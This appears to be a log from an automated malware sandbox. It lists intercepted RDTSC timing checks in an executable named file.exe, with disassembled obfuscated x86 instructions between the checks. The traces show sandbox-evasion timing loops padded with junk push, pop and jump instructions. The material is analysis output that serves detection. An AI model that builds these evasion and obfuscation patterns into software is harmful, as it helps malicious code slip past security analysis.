Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F06A2 second address: 55F06EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F450CC4AB22h 0x00000008 pop ecx 0x00000009 mov edx, 3AF94276h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F450CC4AB1Ch 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F450CC4AB20h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F450CC4AB1Ah 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F06EE second address: 55F06FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F06FD second address: 55F0703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0703 second address: 55F0707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0707 second address: 55F074E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F450CC4AB1Ch 0x0000000e mov dword ptr [esp], ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov al, bh 0x00000016 pushfd 0x00000017 jmp 00007F450CC4AB26h 0x0000001c or ecx, 16464B88h 0x00000022 jmp 00007F450CC4AB1Bh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F074E second address: 55F0754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0754 second address: 55F0758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0758 second address: 55F0791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F450CC4A616h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F450CC4A60Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0791 second address: 55F0797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0797 second address: 55F07C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F450CC4A619h 0x0000000e lea eax, dword ptr [ebp-04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F07C1 second address: 55F07F5 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 4764CAB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F450CC4AB22h 0x0000000e popad 0x0000000f nop 0x00000010 jmp 00007F450CC4AB20h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F07F5 second address: 55F0811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0811 second address: 55F0838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F450CC4AB25h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0838 second address: 55F083E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F098B second address: 55F0991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0991 second address: 55F0995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0995 second address: 55F0010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f sub esp, 04h 0x00000012 xor ebx, ebx 0x00000014 cmp eax, 00000000h 0x00000017 je 00007F450CC4AC63h 0x0000001d xor eax, eax 0x0000001f mov dword ptr [esp], 00000000h 0x00000026 mov dword ptr [esp+04h], 00000000h 0x0000002e call 00007F45115B90ABh 0x00000033 mov edi, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F450CC4AB1Ah 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0010 second address: 55F0014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0014 second address: 55F001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F001A second address: 55F00DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 3A891D3Dh 0x00000010 push esi 0x00000011 pushfd 0x00000012 jmp 00007F450CC4A619h 0x00000017 or si, 0206h 0x0000001c jmp 00007F450CC4A611h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F450CC4A60Ch 0x0000002c sub cx, 10A8h 0x00000031 jmp 00007F450CC4A60Bh 0x00000036 popfd 0x00000037 jmp 00007F450CC4A618h 0x0000003c popad 0x0000003d xchg eax, ebp 0x0000003e jmp 00007F450CC4A610h 0x00000043 mov ebp, esp 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007F450CC4A60Dh 0x0000004e sub ah, 00000026h 0x00000051 jmp 00007F450CC4A611h 0x00000056 popfd 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F00DC second address: 55F00E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F00E2 second address: 55F0134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push FFFFFFFEh 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F450CC4A60Ch 0x00000014 sbb cl, 00000028h 0x00000017 jmp 00007F450CC4A60Bh 0x0000001c popfd 0x0000001d mov ax, F31Fh 0x00000021 popad 0x00000022 call 00007F450CC4A609h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0134 second address: 55F0169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F450CC4AB1Fh 0x00000008 pop esi 0x00000009 jmp 00007F450CC4AB29h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov eax, ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0169 second address: 55F016D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F016D second address: 55F0178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov bl, 02h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0178 second address: 55F0195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F450CC4A60Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0195 second address: 55F0199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0199 second address: 55F019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F019F second address: 55F01C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 5DF2F8B7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F450CC4AB1Dh 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movzx esi, dx 0x0000001e mov ch, bl 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F01C8 second address: 55F01D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A60Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F01D8 second address: 55F0264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007F450CC4AB27h 0x0000000e push 56933E39h 0x00000013 jmp 00007F450CC4AB1Fh 0x00000018 xor dword ptr [esp], 233A1549h 0x0000001f jmp 00007F450CC4AB26h 0x00000024 mov eax, dword ptr fs:[00000000h] 0x0000002a pushad 0x0000002b mov al, A8h 0x0000002d mov eax, edi 0x0000002f popad 0x00000030 push ebx 0x00000031 jmp 00007F450CC4AB22h 0x00000036 mov dword ptr [esp], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F450CC4AB27h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0264 second address: 55F027A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov bx, B546h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub esp, 18h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F027A second address: 55F027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F027E second address: 55F0284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0284 second address: 55F0342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F450CC4AB1Eh 0x0000000f push eax 0x00000010 jmp 00007F450CC4AB1Bh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 jmp 00007F450CC4AB24h 0x0000001c jmp 00007F450CC4AB22h 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F450CC4AB1Eh 0x0000002a sub cx, 19D8h 0x0000002f jmp 00007F450CC4AB1Bh 0x00000034 popfd 0x00000035 push eax 0x00000036 pushfd 0x00000037 jmp 00007F450CC4AB1Fh 0x0000003c adc esi, 00C5DC9Eh 0x00000042 jmp 00007F450CC4AB29h 0x00000047 popfd 0x00000048 pop esi 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F450CC4AB1Dh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0342 second address: 55F03E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, C6h 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f pushfd 0x00000010 jmp 00007F450CC4A60Ch 0x00000015 and eax, 18A508F8h 0x0000001b jmp 00007F450CC4A60Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 jmp 00007F450CC4A616h 0x00000028 push eax 0x00000029 jmp 00007F450CC4A60Bh 0x0000002e xchg eax, edi 0x0000002f jmp 00007F450CC4A616h 0x00000034 mov eax, dword ptr [75AF4538h] 0x00000039 jmp 00007F450CC4A610h 0x0000003e xor dword ptr [ebp-08h], eax 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007F450CC4A60Eh 0x00000048 xor cl, 00000018h 0x0000004b jmp 00007F450CC4A60Bh 0x00000050 popfd 0x00000051 push eax 0x00000052 push edx 0x00000053 movzx esi, bx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F03E7 second address: 55F041E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F450CC4AB1Bh 0x00000008 sbb esi, 42A78CDEh 0x0000000e jmp 00007F450CC4AB29h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xor eax, ebp 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F041E second address: 55F046F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007F450CC4A60Eh 0x0000000c push eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F450CC4A611h 0x00000014 xor ch, 00000076h 0x00000017 jmp 00007F450CC4A611h 0x0000001c popfd 0x0000001d push eax 0x0000001e mov cx, di 0x00000021 pop edx 0x00000022 popad 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edi, 00C29DD6h 0x0000002c mov si, dx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F046F second address: 55F04BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, EFh 0x00000005 mov dh, 28h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-10h] 0x0000000d pushad 0x0000000e push esi 0x0000000f pushfd 0x00000010 jmp 00007F450CC4AB1Fh 0x00000015 sbb ch, 0000000Eh 0x00000018 jmp 00007F450CC4AB29h 0x0000001d popfd 0x0000001e pop esi 0x0000001f mov ebx, 45062004h 0x00000024 popad 0x00000025 mov dword ptr fs:[00000000h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F04BE second address: 55F04C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F04C4 second address: 55F0598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F450CC4AB1Dh 0x00000009 or cx, 91F6h 0x0000000e jmp 00007F450CC4AB21h 0x00000013 popfd 0x00000014 call 00007F450CC4AB20h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [ebp-18h], esp 0x00000020 jmp 00007F450CC4AB21h 0x00000025 mov eax, dword ptr fs:[00000018h] 0x0000002b jmp 00007F450CC4AB1Eh 0x00000030 mov ecx, dword ptr [eax+00000FDCh] 0x00000036 jmp 00007F450CC4AB20h 0x0000003b test ecx, ecx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F450CC4AB1Eh 0x00000044 jmp 00007F450CC4AB25h 0x00000049 popfd 0x0000004a pushad 0x0000004b mov di, ax 0x0000004e mov ah, 28h 0x00000050 popad 0x00000051 popad 0x00000052 jns 00007F450CC4AB77h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007F450CC4AB1Eh 0x00000061 sbb al, 00000068h 0x00000064 jmp 00007F450CC4AB1Bh 0x00000069 popfd 0x0000006a mov edx, esi 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0598 second address: 55F05AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A610h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F05AC second address: 55F0603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d jmp 00007F450CC4AB26h 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 jmp 00007F450CC4AB20h 0x0000001a test ecx, ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F450CC4AB27h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0010 second address: 55E00AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F450CC4A616h 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx edx, si 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F450CC4A616h 0x0000001d or ecx, 2F725958h 0x00000023 jmp 00007F450CC4A60Bh 0x00000028 popfd 0x00000029 popad 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c jmp 00007F450CC4A616h 0x00000031 mov ebp, esp 0x00000033 jmp 00007F450CC4A610h 0x00000038 sub esp, 2Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F450CC4A617h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E00AE second address: 55E00D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1DC0733Ah 0x00000008 push ebx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F450CC4AB1Fh 0x00000016 pop esi 0x00000017 mov dh, 63h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0196 second address: 55E01A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A60Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E01A9 second address: 55E01AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E01AD second address: 55E01C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F450CC4A610h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E01C9 second address: 55E0216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F450CC4ACA8h 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 pushfd 0x00000014 jmp 00007F450CC4AB21h 0x00000019 sbb ecx, 51758D66h 0x0000001f jmp 00007F450CC4AB21h 0x00000024 popfd 0x00000025 popad 0x00000026 lea ecx, dword ptr [ebp-14h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0216 second address: 55E021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E021C second address: 55E0245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 5687h 0x00000007 mov ecx, 222ED423h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [ebp-14h], edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F450CC4AB25h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0274 second address: 55E0278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0278 second address: 55E027C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E027C second address: 55E0282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0282 second address: 55E02C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F450CC4AB1Bh 0x0000000f nop 0x00000010 pushad 0x00000011 jmp 00007F450CC4AB24h 0x00000016 push eax 0x00000017 push edx 0x00000018 mov ah, 2Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E02EB second address: 55E038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F450CC4A60Fh 0x00000009 adc si, B82Eh 0x0000000e jmp 00007F450CC4A619h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jg 00007F457D108772h 0x0000001d jmp 00007F450CC4A60Dh 0x00000022 js 00007F450CC4A63Dh 0x00000028 jmp 00007F450CC4A60Eh 0x0000002d cmp dword ptr [ebp-14h], edi 0x00000030 jmp 00007F450CC4A610h 0x00000035 jne 00007F457D108747h 0x0000003b jmp 00007F450CC4A610h 0x00000040 mov ebx, dword ptr [ebp+08h] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F450CC4A617h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E038C second address: 55E03C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, BEh 0x00000011 jmp 00007F450CC4AB24h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E03C6 second address: 55E03EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F450CC4A612h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E03EB second address: 55E048D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F450CC4AB22h 0x00000008 jmp 00007F450CC4AB25h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 mov ax, E53Dh 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c call 00007F450CC4AB22h 0x00000021 mov esi, 57193CE1h 0x00000026 pop esi 0x00000027 mov dl, 60h 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c jmp 00007F450CC4AB24h 0x00000031 pushfd 0x00000032 jmp 00007F450CC4AB22h 0x00000037 xor al, FFFFFFD8h 0x0000003a jmp 00007F450CC4AB1Bh 0x0000003f popfd 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F450CC4AB20h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E048D second address: 55E0493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0493 second address: 55E0499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E0499 second address: 55E049D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E049D second address: 55E04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E04C2 second address: 55E04C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E04C8 second address: 55E0518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F450CC4AB25h 0x00000009 xor ecx, 50100636h 0x0000000f jmp 00007F450CC4AB21h 0x00000014 popfd 0x00000015 mov bx, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F450CC4AB24h 0x00000025 rdtsc
